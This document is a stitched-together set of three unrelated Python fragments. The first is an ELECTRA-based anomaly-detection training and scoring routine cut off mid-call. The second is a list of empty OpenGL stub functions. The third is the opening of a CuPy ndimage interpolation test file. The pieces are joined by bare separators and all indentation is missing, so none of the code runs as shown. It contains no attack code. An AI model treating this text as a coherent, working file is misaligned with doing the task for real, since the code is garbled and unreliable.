eval_dataset = DocumentDataset(
self.tokenizer,
self.args,
eval_file,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
logger.info(" Using train_document")
else:
train_dataset = SimpleDataset(
self.tokenizer,
self.args,
train_file,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
eval_dataset = SimpleDataset(
self.tokenizer,
self.args,
eval_file,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
eval_doc_dataset = DocumentDataset(
self.tokenizer,
self.args,
eval_file,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
eval_doc_dataset_outliers = DocumentDataset(
self.tokenizer,
self.args,
eval_file_outlier,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
self.build_text_samples(eval_file, eval_file_outlier)
global_step, tr_loss = self.train_anomaly(
train_dataset,
eval_dataset,
eval_doc_dataset,
eval_doc_dataset_outliers,
show_running_loss=show_running_loss,
verbose=verbose,
**kwargs,
)
self._save_model(output_dir, model=self.model)
if self.args.model_type == "electra":
self.save_discriminator()
self.save_generator()
if verbose:
logger.info(" Training of {} model complete. Saved to {}.".format(
self.args.model_type, output_dir))
def extract_representations(self,
dataloader,
step,
path='./representations/',
name='train',
dump=True):
with torch.no_grad():
total = 0
representations = []
model = self.model.discriminator_model
model.eval()
batches = merge_batches(dataloader, f'repr_extract_{name}_rand')
for batch, idx_list in batches:
if batch is None:
continue
batch = batch.to(self.device).long()
output = model(batch)
reprs = output[-1].cpu().numpy()
reprs = np.split(reprs, idx_list)
reprs = np.array([np.mean(t, axis=0) for t in reprs])
representations.append(reprs)
del batches
representations = np.concatenate(representations, axis=0)
dump_name = self.extra_args['tensorboard_dir'][10:]
if dump:
with open(f'{path}{name}{dump_name}_{step}.pkl',
'wb') as f_out:
pkl.dump(representations, f_out)
del representations
def test_anomaly(self, batch):
args = self.args
tokenizer = self.tokenizer
if not ("vanilla_electra" in self.extra_args and self.extra_args["vanilla_electra"] != False):
masks = self.masks
masks_len = len(masks)
unsorted_outs = []
else:
masks_len = self.extra_args['vanilla_electra']['no_masks']
rmd_classes = masks_len #hardcoded, should be changed for RMD anomaly detection
masks_len = 1
unsorted_outs_rtd = []
repr_list = []
preds = []
batch_size = batch.shape[0]
unsorted_outs_rtd_electra = []
binary_labels = []
pad_labels = []
model = self.model
model.eval()
input_tokens = []
if 'replace_tokens' in self.extra_args:
replace_tokens = self.extra_args['replace_tokens']
else:
replace_tokens = True
with torch.no_grad():
if not ("vanilla_electra" in self.extra_args and self.extra_args["vanilla_electra"] != False):
# to do: just viable masks
for mask_idx, mask_ in enumerate(masks):
mask_['mask'] = [False for _ in mask_['mask']]
inputs, labels, _ = mask_tokens(batch, tokenizer, masks, args, custom_mask=mask_, train=False, no_mask=True)
is_pad = [[1 if el == tokenizer.convert_tokens_to_ids(tokenizer.pad_token) else 0 for el in input_] for input_ in inputs]
is_pad = np.array(is_pad)
pad_labels.append(np.expand_dims(is_pad, axis=1))
labels_bin = [[0 if el == -100 else 1 for el in mask]
for mask in labels]
labels_bin = np.array(labels_bin)
binary_labels.append(np.expand_dims(labels_bin, axis=1))
inputs = inputs.to(self.device)
labels = labels.to(self.device)
output = model(inputs, masked_lm_labels=labels, replace_tokens=replace_tokens) if args.mlm else model(inputs, labels=labels)
d_output, d_inputs, rtd_output = output[2], output[3].cpu(), output[8]
representations = output[7].cpu()
out_softmax = F.softmax(d_output).cpu().numpy()
unsorted_outs.append(out_softmax)
repr_list.append(representations)
rtd_output = F.sigmoid(rtd_output).cpu().numpy()
rtd_full_probs = 1 - rtd_output
rtd_full_probs = np.expand_dims(rtd_full_probs, axis=-1)
rtd_full_probs = np.concatenate((rtd_full_probs, np.expand_dims(rtd_output, axis=-1)), axis=-1)
unsorted_outs_rtd_electra.append(np.expand_dims(rtd_full_probs, axis=1))
if len(rtd_output.shape) == 1:
rtd_output = np.expand_dims(rtd_output, 0)
row_sums_rtd = rtd_output.sum(axis=1)
rtd_output_normalized = rtd_output / row_sums_rtd[:, np.newaxis]
unsorted_outs_rtd.append(rtd_output_normalized)
break
else:
for mask_idx in range(self.extra_args['vanilla_electra']['no_masks']):
inputs, labels = mask_tokens_vanilla(
batch, tokenizer, args) if args.mlm else (batch, batch)
is_pad = [[1 if el == tokenizer.convert_tokens_to_ids(tokenizer.pad_token) else 0 for el in input_] for input_ in inputs]
is_pad = np.array(is_pad)
pad_labels.append(np.expand_dims(is_pad, axis=1))
labels_bin = [[0 if el == -100 else 1 for el in mask]
for mask in labels]
labels_bin = np.array(labels_bin)
binary_labels.append(np.expand_dims(labels_bin, axis=1))
inputs = inputs.to(self.device)
labels = labels.to(self.device)
output = model(inputs, masked_lm_labels=labels) if args.mlm else model(inputs, labels=labels)
rtd_output = output[6]
rtd_output = F.sigmoid(rtd_output).cpu().numpy()
rtd_full_probs = 1 - rtd_output
rtd_full_probs = np.expand_dims(rtd_full_probs, axis=-1)
rtd_full_probs = np.concatenate((rtd_full_probs, np.expand_dims(rtd_output, axis=-1)), axis=-1)
unsorted_outs_rtd_electra.append(np.expand_dims(rtd_full_probs, axis=1))
row_sums_rtd = rtd_output.sum(axis=1)
rtd_output_normalized = rtd_output / row_sums_rtd[:, np.newaxis]
unsorted_outs_rtd.append(rtd_output_normalized)
break
rtd_full_probs = np.concatenate(unsorted_outs_rtd_electra, axis=1)
binary_labels = np.concatenate(binary_labels, axis=1)
pad_labels = np.concatenate(pad_labels, axis=1)
if len(rtd_full_probs.shape) == 3:
rtd_full_probs = np.expand_dims(rtd_full_probs, 0)
if not ("vanilla_electra" in self.extra_args and self.extra_args["vanilla_electra"] != False):
unsorted_outs = np.concatenate(unsorted_outs, axis=0) # axis 0 is inference batch
repr_list = np.concatenate(repr_list, axis=0)
unsorted_outs = np.reshape(unsorted_outs, (masks_len, batch_size, rmd_classes))
unsorted_outs = np.transpose(unsorted_outs, (1, 0, 2))
scores_ne = np.zeros((unsorted_outs.shape[0], unsorted_outs.shape[1]))
scores_pl = np.zeros((unsorted_outs.shape[0], unsorted_outs.shape[1]))
scores_mp = np.zeros((unsorted_outs.shape[0], unsorted_outs.shape[1]))
unsorted_outs_rtd = np.concatenate(unsorted_outs_rtd, axis=0)
unsorted_outs_rtd = np.reshape(unsorted_outs_rtd, (masks_len, batch_size, self.extra_args["max_seq_length"]))
unsorted_outs_rtd = np.transpose(unsorted_outs_rtd, (1, 0, 2))
scores_pl_electra = np.zeros(
(unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
scores_pl_electra_corrupt = np.zeros(
(unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
scores_pl_electra_clean = np.zeros(
(unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
scores_ne_electra_2 = np.zeros((unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
scores_pl_electra_2 = np.zeros((unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
scores_mp_electra_2 = np.zeros((unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
self.current_batch_scores_pl = np.full_like(unsorted_outs_rtd, np.inf)
short_anomalies = 0
if not ("vanilla_electra" in self.extra_args and self.extra_args["vanilla_electra"] != False):
for b_el in range(unsorted_outs.shape[0]): #batch elem
for msk_idx in range(unsorted_outs.shape[1]):
scores_ne[b_el][msk_idx] = neg_entropy(unsorted_outs[b_el][msk_idx][:]) #batch_el, msk_id, probs
scores_pl[b_el][msk_idx] = unsorted_outs[b_el][msk_idx][msk_idx]
scores_mp[b_el][:] = np.max(unsorted_outs[b_el][:][:], axis=1)
score_mp_electra_2 = []
score_ne_electra_2 = []
score_pl_electra_2 = []
seq_len = np.count_nonzero(pad_labels[b_el][msk_idx]==0)
for seq_el in range(rtd_full_probs.shape[-2]): # for every el in seq
if seq_el == 0 or seq_el == rtd_full_probs.shape[-2] - 1:
continue
label_idx = binary_labels[b_el][msk_idx][seq_el]
score_ne_val = neg_entropy(rtd_full_probs[b_el][msk_idx][seq_el][:])
score_pl_val = rtd_full_probs[b_el][msk_idx][seq_el][label_idx]
score_mp_val = np.max(rtd_full_probs[b_el][msk_idx][seq_el][:])
if "short_anomalies" in self.extra_args:
if seq_len <= self.extra_args['short_anomalies']:
score_ne_val = 0
score_pl_val = 0
score_mp_val = 0
if pad_labels[b_el][msk_idx][seq_el] == 0:
score_mp_electra_2.append(score_mp_val)
score_ne_electra_2.append(score_ne_val)
self.current_batch = batch.numpy()
self.current_batch_scores_pl[b_el][msk_idx][seq_el] = score_pl_val
score_pl_electra_2.append(score_pl_val)
scores_ne_electra_2[b_el][msk_idx] = np.mean(score_ne_electra_2)
scores_pl_electra_2[b_el][msk_idx] = np.mean(score_pl_electra_2)
scores_mp_electra_2[b_el][msk_idx] = np.mean(score_mp_electra_2)
break
scores_ne = scores_ne.mean(axis=-1)
scores_pl = scores_pl.mean(axis=-1)
scores_mp = scores_mp.mean(axis=-1)
scores_ne_electra_2 = scores_ne_electra_2.mean(axis=-1)
scores_pl_electra_2 = scores_pl_electra_2.mean(axis=-1)
scores_mp_electra_2 = scores_mp_electra_2.mean(axis=-1)
return scores_pl, scores_mp, scores_ne, scores_pl_electra_2, scores_mp_electra_2, scores_ne_electra_2, repr_list
else:
for b_el in range(unsorted_outs_rtd.shape[0]): #batch elem
for msk_idx in range(self.extra_args['vanilla_electra']['no_masks']):
score_mp_electra_2 = []
score_ne_electra_2 = []
score_pl_electra_2 = []
for seq_el in range(rtd_full_probs.shape[-2]): # for every el in seq
if seq_el == 0 or seq_el == rtd_full_probs.shape[-2] - 1:
continue
# score_ne_electra[seq_el] = neg_entropy(rtd_full_probs[b_el][msk_idx][seq_el][:])
label_idx = binary_labels[b_el][msk_idx][seq_el]
# score_pl_electra[seq_el] = rtd_full_probs[b_el][msk_idx][seq_el][label_idx]
# score_mp_electra[seq_el] = np.max(rtd_full_probs[b_el][msk_idx][seq_el][:])
score_ne_val = neg_entropy(rtd_full_probs[b_el][msk_idx][seq_el][:])
score_pl_val = rtd_full_probs[b_el][msk_idx][seq_el][label_idx]
score_mp_val = np.max(rtd_full_probs[b_el][msk_idx][seq_el][:])
if pad_labels[b_el][msk_idx][seq_el] == 0:
score_mp_electra_2.append(score_mp_val)
score_ne_electra_2.append(score_ne_val)
self.current_batch = batch.numpy()
self.current_batch_scores_pl[b_el][msk_idx][seq_el] = score_pl_val
score_pl_electra_2.append(score_pl_val)
scores_ne_electra_2[b_el][msk_idx] = np.mean(score_ne_electra_2)
scores_pl_electra_2[b_el][msk_idx] = np.mean(score_pl_electra_2)
scores_mp_electra_2[b_el][msk_idx] = np.mean(score_mp_electra_2)
break
scores_ne_electra_2 = scores_ne_electra_2.mean(axis=-1)
scores_pl_electra_2 = scores_pl_electra_2.mean(axis=-1)
scores_mp_electra_2 = scores_mp_electra_2.mean(axis=-1)
return scores_pl_electra_2, score_mp_electra_2, scores_ne_electra_2
def train_anomaly(
self,
train_dataset,
eval_dataset,
eval_doc_dataset,
eval_doc_dataset_outliers,
show_running_loss=True,
verbose=True,
sched_params=None,
**kwargs,
):
"""
Trains the model on train_dataset.
Utility function to be used by the train_model() method. Not intended to be used directly.
"""
masks = self.masks
model = self.model
args = self.args
tokenizer = self.tokenizer
if self.extra_args['random_generator'] == False:
logger.info(' USING GENERATOR LOSS')
if self.extra_args['use_rtd_loss'] == True:
logger.info(' USING RTD LOSS')
if "vanilla_electra" in self.extra_args and self.extra_args["vanilla_electra"] != False:
logger.info(' USING ELECTRA-VANILLA-OD')
def collate(examples: List[torch.Tensor]):
if tokenizer._pad_token is None:
return pad_sequence(examples, batch_first=True)
return pad_sequence(examples,
batch_first=True,
padding_value=tokenizer.pad_token_id)
if self.is_world_master():
tb_writer = SummaryWriter(logdir=args.tensorboard_dir)
self.tb_writer = tb_writer
train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(train_dataset)
train_dataloader = DataLoader(train_dataset,
batch_size=args.train_batch_size,
sampler=train_sampler,
collate_fn=collate,
num_workers=4)
if self.extra_args['extract_repr']:
train_sampler_repr = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(train_dataset)
train_dataloader_repr = DataLoader(train_dataset,
batch_size=args.train_batch_size,
sampler=train_sampler_repr,
collate_fn=collate,
num_workers=4)
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = (
args.max_steps //
(len(train_dataloader) // args.gradient_accumulation_steps) +
1)
else:
t_total = len(
train_dataloader
) // args.gradient_accumulation_steps * args.num_train_epochs
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
# generator
"params": [
p for n, p in model.generator_model.named_parameters()
if not any(nd in n for nd in no_decay)
],
"weight_decay":
args.weight_decay,
"lr":
args.learning_rate * self.extra_args["mlm_lr_ratio"],
},
{
# generator w/o weight_decay
"params": [
p for n, p in model.generator_model.named_parameters()
if any(nd in n for nd in no_decay)
],
"lr":
args.learning_rate * self.extra_args["mlm_lr_ratio"],
}
]
# discriminator
disc_unique_params = []
for n, pgr in model.discriminator_model.named_parameters():
if n not in [
"electra.embeddings.word_embeddings.weight",
"electra.embeddings.position_embeddings.weight",
"electra.embeddings.token_type_embeddings.weight"
]:
disc_unique_params.append((n, pgr))
# print("Disc unique", n, pgr.shape)
optimizer_grouped_parameters.append({
"params": [
p for n, p in disc_unique_params
if not any(nd in n for nd in no_decay)
],
"weight_decay":
args.weight_decay,
"lr":
args.learning_rate,
})
optimizer_grouped_parameters.append({
"params": [
p for n, p in disc_unique_params
if any(nd in n for nd in no_decay)
],
"lr":
args.learning_rate,
})
# optimizer
warmup_steps = math.ceil(t_total * args.warmup_ratio)
args.warmup_steps = warmup_steps if args.warmup_steps == 0 else args.warmup_steps
if args.optimizer == "AdamW":
optimizer = AdamW(optimizer_grouped_parameters,
lr=args.learning_rate,
eps=args.adam_epsilon,
amsgrad=True)
else:
optimizer = SGD(optimizer_grouped_parameters,
lr=args.learning_rate,
momentum=0.9,
weight_decay=args.weight_decay)
pytorch_total_params = sum(p.numel() for p in model.parameters()
if p.requires_grad)
optimizer_total_params = 0
for pgroup in optimizer_grouped_parameters:
optimizer_total_params += sum(p.numel() for p in pgroup["params"])
assert (pytorch_total_params == optimizer_total_params)
tb_writer.add_text(f'total-params', str(pytorch_total_params), 0)
logger.info(f' TOTAL PARAMETERS: {pytorch_total_params}')
tb_writer.add_text(f'tokenizer-len', str(len(self.tokenizer)), 0)
logger.info(f' TOKENIZER LEN: {len(self.tokenizer)}')
tb_writer.add_text(f'args', str(self.extra_args))
if sched_params is not None:
if sched_params['sched_name'] == 'plateau':
from torch.optim.lr_scheduler import ReduceLROnPlateau
scheduler = ReduceLROnPlateau(
optimizer=optimizer,
factor=sched_params['factor'],
patience=sched_params['patience'],
verbose=sched_params['verbose'],
threshold=sched_params['threshold'],
min_lr=sched_params['min_lr'])
else:
scheduler = get_linear_schedule_with_warmup(
optimizer,
| |
pass
def glColorMaterial(*argv):
'''no string
'''
pass
def glCompileShader(*argv):
'''no string
'''
pass
def glCopyPixels(*argv):
'''no string
'''
pass
def glCopyTexImage2D(*argv):
'''no string
'''
pass
def glCreateProgram(*argv):
'''no string
'''
pass
def glCreateShader(*argv):
'''no string
'''
pass
def glCullFace(*argv):
'''no string
'''
pass
def glDeleteLists(*argv):
'''no string
'''
pass
def glDeleteProgram(*argv):
'''no string
'''
pass
def glDeleteShader(*argv):
'''no string
'''
pass
def glDeleteTextures(*argv):
'''no string
'''
pass
def glDepthFunc(*argv):
'''no string
'''
pass
def glDepthMask(*argv):
'''no string
'''
pass
def glDepthRange(*argv):
'''no string
'''
pass
def glDetachShader(*argv):
'''no string
'''
pass
def glDisable(*argv):
'''no string
'''
pass
def glDrawBuffer(*argv):
'''no string
'''
pass
def glDrawPixels(*argv):
'''no string
'''
pass
def glEdgeFlag(*argv):
'''no string
'''
pass
def glEdgeFlagv(*argv):
'''no string
'''
pass
def glEnable(*argv):
'''no string
'''
pass
def glEnd(*argv):
'''no string
'''
pass
def glEndList(*argv):
'''no string
'''
pass
def glEvalCoord1d(*argv):
'''no string
'''
pass
def glEvalCoord1dv(*argv):
'''no string
'''
pass
def glEvalCoord1f(*argv):
'''no string
'''
pass
def glEvalCoord1fv(*argv):
'''no string
'''
pass
def glEvalCoord2d(*argv):
'''no string
'''
pass
def glEvalCoord2dv(*argv):
'''no string
'''
pass
def glEvalCoord2f(*argv):
'''no string
'''
pass
def glEvalCoord2fv(*argv):
'''no string
'''
pass
def glEvalMesh1(*argv):
'''no string
'''
pass
def glEvalMesh2(*argv):
'''no string
'''
pass
def glEvalPoint1(*argv):
'''no string
'''
pass
def glEvalPoint2(*argv):
'''no string
'''
pass
def glFeedbackBuffer(*argv):
'''no string
'''
pass
def glFinish(*argv):
'''no string
'''
pass
def glFlush(*argv):
'''no string
'''
pass
def glFogf(*argv):
'''no string
'''
pass
def glFogfv(*argv):
'''no string
'''
pass
def glFogi(*argv):
'''no string
'''
pass
def glFogiv(*argv):
'''no string
'''
pass
def glFrontFace(*argv):
'''no string
'''
pass
def glFrustum(*argv):
'''no string
'''
pass
def glGenLists(*argv):
'''no string
'''
pass
def glGenTextures(*argv):
'''no string
'''
pass
def glGetAttachedShaders(*argv):
'''no string
'''
pass
def glGetBooleanv(*argv):
'''no string
'''
pass
def glGetClipPlane(*argv):
'''no string
'''
pass
def glGetDoublev(*argv):
'''no string
'''
pass
def glGetError(*argv):
'''no string
'''
pass
def glGetFloatv(*argv):
'''no string
'''
pass
def glGetIntegerv(*argv):
'''no string
'''
pass
def glGetLightfv(*argv):
'''no string
'''
pass
def glGetLightiv(*argv):
'''no string
'''
pass
def glGetMapdv(*argv):
'''no string
'''
pass
def glGetMapfv(*argv):
'''no string
'''
pass
def glGetMapiv(*argv):
'''no string
'''
pass
def glGetMaterialfv(*argv):
'''no string
'''
pass
def glGetMaterialiv(*argv):
'''no string
'''
pass
def glGetPixelMapfv(*argv):
'''no string
'''
pass
def glGetPixelMapuiv(*argv):
'''no string
'''
pass
def glGetPixelMapusv(*argv):
'''no string
'''
pass
def glGetPolygonStipple(*argv):
'''no string
'''
pass
def glGetProgramInfoLog(*argv):
'''no string
'''
pass
def glGetProgramiv(*argv):
'''no string
'''
pass
def glGetShaderInfoLog(*argv):
'''no string
'''
pass
def glGetShaderSource(*argv):
'''no string
'''
pass
def glGetShaderiv(*argv):
'''no string
'''
pass
def glGetString(*argv):
'''no string
'''
pass
def glGetTexEnvfv(*argv):
'''no string
'''
pass
def glGetTexEnviv(*argv):
'''no string
'''
pass
def glGetTexGendv(*argv):
'''no string
'''
pass
def glGetTexGenfv(*argv):
'''no string
'''
pass
def glGetTexGeniv(*argv):
'''no string
'''
pass
def glGetTexImage(*argv):
'''no string
'''
pass
def glGetTexLevelParameterfv(*argv):
'''no string
'''
pass
def glGetTexLevelParameteriv(*argv):
'''no string
'''
pass
def glGetTexParameterfv(*argv):
'''no string
'''
pass
def glGetTexParameteriv(*argv):
'''no string
'''
pass
def glGetUniformLocation(*argv):
'''no string
'''
pass
def glHint(*argv):
'''no string
'''
pass
def glIndexMask(*argv):
'''no string
'''
pass
def glIndexd(*argv):
'''no string
'''
pass
def glIndexdv(*argv):
'''no string
'''
pass
def glIndexf(*argv):
'''no string
'''
pass
def glIndexfv(*argv):
'''no string
'''
pass
def glIndexi(*argv):
'''no string
'''
pass
def glIndexiv(*argv):
'''no string
'''
pass
def glIndexs(*argv):
'''no string
'''
pass
def glIndexsv(*argv):
'''no string
'''
pass
def glInitNames(*argv):
'''no string
'''
pass
def glIsEnabled(*argv):
'''no string
'''
pass
def glIsList(*argv):
'''no string
'''
pass
def glIsProgram(*argv):
'''no string
'''
pass
def glIsShader(*argv):
'''no string
'''
pass
def glIsTexture(*argv):
'''no string
'''
pass
def glLightModelf(*argv):
'''no string
'''
pass
def glLightModelfv(*argv):
'''no string
'''
pass
def glLightModeli(*argv):
'''no string
'''
pass
def glLightModeliv(*argv):
'''no string
'''
pass
def glLightf(*argv):
'''no string
'''
pass
def glLightfv(*argv):
'''no string
'''
pass
def glLighti(*argv):
'''no string
'''
pass
def glLightiv(*argv):
'''no string
'''
pass
def glLineStipple(*argv):
'''no string
'''
pass
def glLineWidth(*argv):
'''no string
'''
pass
def glLinkProgram(*argv):
'''no string
'''
pass
def glListBase(*argv):
'''no string
'''
pass
def glLoadIdentity(*argv):
'''no string
'''
pass
def glLoadMatrixd(*argv):
'''no string
'''
pass
def glLoadMatrixf(*argv):
'''no string
'''
pass
def glLoadName(*argv):
'''no string
'''
pass
def glLogicOp(*argv):
'''no string
'''
pass
def glMap1d(*argv):
'''no string
'''
pass
def glMap1f(*argv):
'''no string
'''
pass
def glMap2d(*argv):
'''no string
'''
pass
def glMap2f(*argv):
'''no string
'''
pass
def glMapGrid1d(*argv):
'''no string
'''
pass
def glMapGrid1f(*argv):
'''no string
'''
pass
def glMapGrid2d(*argv):
'''no string
'''
pass
def glMapGrid2f(*argv):
'''no string
'''
pass
def glMaterialf(*argv):
'''no string
'''
pass
def glMaterialfv(*argv):
'''no string
'''
pass
def glMateriali(*argv):
'''no string
'''
pass
def glMaterialiv(*argv):
'''no string
'''
pass
def glMatrixMode(*argv):
'''no string
'''
pass
def glMultMatrixd(*argv):
'''no string
'''
pass
def glMultMatrixf(*argv):
'''no string
'''
pass
def glNewList(*argv):
'''no string
'''
pass
def glNormal3b(*argv):
'''no string
'''
pass
def glNormal3bv(*argv):
'''no string
'''
pass
def glNormal3d(*argv):
'''no string
'''
pass
def glNormal3dv(*argv):
'''no string
'''
pass
def glNormal3f(*argv):
'''no string
'''
pass
def glNormal3fv(*argv):
'''no string
'''
pass
def glNormal3i(*argv):
'''no string
'''
pass
def glNormal3iv(*argv):
'''no string
'''
pass
def glNormal3s(*argv):
'''no string
'''
pass
def glNormal3sv(*argv):
'''no string
'''
pass
def glOrtho(*argv):
'''no string
'''
pass
def glPassThrough(*argv):
'''no string
'''
pass
def glPixelMapfv(*argv):
'''no string
'''
pass
def glPixelMapuiv(*argv):
'''no string
'''
pass
def glPixelMapusv(*argv):
'''no string
'''
pass
def glPixelStoref(*argv):
'''no string
'''
pass
def glPixelStorei(*argv):
'''no string
'''
pass
def glPixelTransferf(*argv):
'''no string
'''
pass
def glPixelTransferi(*argv):
'''no string
'''
pass
def glPixelZoom(*argv):
'''no string
'''
pass
def glPointSize(*argv):
'''no string
'''
pass
def glPolygonMode(*argv):
'''no string
'''
pass
def glPolygonOffset(*argv):
'''no string
'''
pass
def glPolygonStipple(*argv):
'''no string
'''
pass
def glPopAttrib(*argv):
'''no string
'''
pass
def glPopClientAttrib(*argv):
'''no string
'''
pass
def glPopMatrix(*argv):
'''no string
'''
pass
def glPopName(*argv):
'''no string
'''
pass
def glPrioritizeTextures(*argv):
'''no string
'''
pass
def glPushAttrib(*argv):
'''no string
'''
pass
def glPushClientAttrib(*argv):
'''no string
'''
pass
def glPushMatrix(*argv):
'''no string
'''
pass
def glPushName(*argv):
'''no string
'''
pass
def glRasterPos2d(*argv):
'''no string
'''
pass
def glRasterPos2dv(*argv):
'''no string
'''
pass
def glRasterPos2f(*argv):
'''no string
'''
pass
def glRasterPos2fv(*argv):
'''no string
'''
pass
def glRasterPos2i(*argv):
'''no string
'''
pass
def glRasterPos2iv(*argv):
'''no string
'''
pass
def glRasterPos2s(*argv):
'''no string
'''
pass
def glRasterPos2sv(*argv):
'''no string
'''
pass
def glRasterPos3d(*argv):
'''no string
'''
pass
def glRasterPos3dv(*argv):
'''no string
'''
pass
def glRasterPos3f(*argv):
'''no string
'''
pass
def glRasterPos3fv(*argv):
'''no string
'''
pass
def glRasterPos3i(*argv):
'''no string
'''
pass
def glRasterPos3iv(*argv):
'''no string
'''
pass
def glRasterPos3s(*argv):
'''no string
'''
pass
def glRasterPos3sv(*argv):
'''no string
'''
pass
def glRasterPos4d(*argv):
'''no string
'''
pass
def glRasterPos4dv(*argv):
'''no string
'''
pass
def glRasterPos4f(*argv):
'''no string
'''
pass
def glRasterPos4fv(*argv):
'''no string
'''
pass
def glRasterPos4i(*argv):
'''no string
'''
pass
def glRasterPos4iv(*argv):
'''no string
'''
pass
def glRasterPos4s(*argv):
'''no string
'''
pass
def glRasterPos4sv(*argv):
'''no string
'''
pass
def glReadBuffer(*argv):
'''no string
'''
pass
def glReadPixels(*argv):
'''no string
'''
pass
def glRectd(*argv):
'''no string
'''
pass
def glRectdv(*argv):
'''no string
'''
pass
def glRectf(*argv):
'''no string
'''
pass
def glRectfv(*argv):
'''no string
'''
pass
def glRecti(*argv):
'''no string
'''
pass
def glRectiv(*argv):
'''no string
'''
pass
def glRects(*argv):
'''no string
'''
pass
def glRectsv(*argv):
'''no string
'''
pass
def glRenderMode(*argv):
'''no string
'''
pass
def glRotated(*argv):
'''no string
'''
pass
def glRotatef(*argv):
'''no string
'''
pass
def glScaled(*argv):
'''no string
'''
pass
def glScalef(*argv):
'''no string
'''
pass
def glScissor(*argv):
'''no string
'''
pass
def glSelectBuffer(*argv):
'''no string
'''
pass
def glShadeModel(*argv):
'''no string
'''
pass
def glShaderSource(*argv):
'''no string
'''
pass
def glStencilFunc(*argv):
'''no string
'''
pass
def glStencilMask(*argv):
'''no string
'''
pass
def glStencilOp(*argv):
'''no string
'''
pass
def glTexCoord1d(*argv):
'''no string
'''
pass
def glTexCoord1dv(*argv):
'''no string
'''
pass
def glTexCoord1f(*argv):
'''no string
'''
pass
def glTexCoord1fv(*argv):
'''no string
'''
pass
def glTexCoord1i(*argv):
| |
<filename>tests/cupyx_tests/scipy_tests/ndimage_tests/test_interpolation.py<gh_stars>1000+
import numpy
import pytest
import cupy
from cupy.cuda import runtime
from cupy import testing
import cupyx.scipy.ndimage
from cupyx.scipy.ndimage import _util
try:
import scipy
import scipy.ndimage
scipy_version = numpy.lib.NumpyVersion(scipy.__version__)
except ImportError:
pass
try:
import cv2
except ImportError:
pass
# testing these modes can only be tested against SciPy >= 1.6.0+
scipy16_modes = ['wrap', 'grid-wrap', 'reflect', 'grid-mirror',
'grid-constant']
# these modes are okay to test on older SciPy
legacy_modes = ['constant', 'nearest', 'mirror']
def _conditional_scipy_version_skip(mode, order):
if ((mode in scipy16_modes or (mode != 'mirror' and order > 1)) and
(scipy_version < '1.6.0')):
pytest.skip(
'SciPy >= 1.6.0 needed to test this mode/order combination.')
@testing.parameterize(*testing.product({
'output': [None, numpy.float64, 'f', float, 'empty'],
'order': [0, 1, 2, 3, 4, 5],
'mode': ['constant', 'nearest', 'mirror'] + scipy16_modes,
'cval': [1.0],
'prefilter': [True],
}))
@testing.gpu
@testing.with_requires('scipy')
class TestMapCoordinates:
_multiprocess_can_split = True
def _map_coordinates(self, xp, scp, a, coordinates):
_conditional_scipy_version_skip(self.mode, self.order)
map_coordinates = scp.ndimage.map_coordinates
if self.output == 'empty':
output = xp.empty(coordinates.shape[1:], dtype=a.dtype)
return_value = map_coordinates(a, coordinates, output, self.order,
self.mode, self.cval,
self.prefilter)
assert return_value is None or return_value is output
return output
else:
return map_coordinates(a, coordinates, self.output, self.order,
self.mode, self.cval, self.prefilter)
@testing.for_float_dtypes(no_float16=True)
@testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
def test_map_coordinates_float(self, xp, scp, dtype):
a = testing.shaped_random((100, 100), xp, dtype)
coordinates = testing.shaped_random((a.ndim, 100), xp, dtype)
return self._map_coordinates(xp, scp, a, coordinates)
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
@testing.with_requires('scipy>=1.6.0')
def test_map_coordinates_complex_float(self, xp, scp, dtype):
# promote output to a complex dtype
if self.output == numpy.float64:
self.output = numpy.complex128
elif self.output == float:
self.output = complex
elif self.output == 'f':
self.output = 'F'
a = testing.shaped_random((100, 100), xp, dtype)
coordinates = testing.shaped_random((a.ndim, 100), xp, xp.float64)
return self._map_coordinates(xp, scp, a, coordinates)
@testing.for_float_dtypes(no_float16=True)
@testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
def test_map_coordinates_fortran_order(self, xp, scp, dtype):
a = testing.shaped_random((100, 100), xp, dtype)
coordinates = testing.shaped_random((a.ndim, 100), xp, dtype)
a = xp.asfortranarray(a)
coordinates = xp.asfortranarray(coordinates)
return self._map_coordinates(xp, scp, a, coordinates)
@testing.for_float_dtypes(no_float16=True)
@testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
def test_map_coordinates_float_nd_coords(self, xp, scp, dtype):
a = testing.shaped_random((100, 100), xp, dtype)
coordinates = testing.shaped_random((a.ndim, 10, 10), xp, dtype,
scale=99.0)
return self._map_coordinates(xp, scp, a, coordinates)
@testing.for_int_dtypes(no_bool=True)
@testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
def test_map_coordinates_int(self, xp, scp, dtype):
if numpy.lib.NumpyVersion(scipy.__version__) < '1.0.0':
if dtype in (numpy.dtype('l'), numpy.dtype('q')):
dtype = numpy.int64
elif dtype in (numpy.dtype('L'), numpy.dtype('Q')):
dtype = numpy.uint64
a = testing.shaped_random((100, 100), xp, dtype)
coordinates = testing.shaped_random((a.ndim, 100), xp, dtype)
out = self._map_coordinates(xp, scp, a, coordinates)
float_out = self._map_coordinates(xp, scp, a.astype(xp.float64),
coordinates) % 1
half = xp.full_like(float_out, 0.5)
out[xp.isclose(float_out, half, atol=1e-5)] = 0
return out
@testing.parameterize(*testing.product({
'order': [0, 1, 2, 3, 4, 5],
'mode': ['constant', 'nearest', 'mirror'] + scipy16_modes,
}))
@testing.gpu
@testing.with_requires('scipy')
class TestMapCoordinatesHalfInteger:
def _map_coordinates(self, xp, scp, a, coordinates):
_conditional_scipy_version_skip(self.mode, self.order)
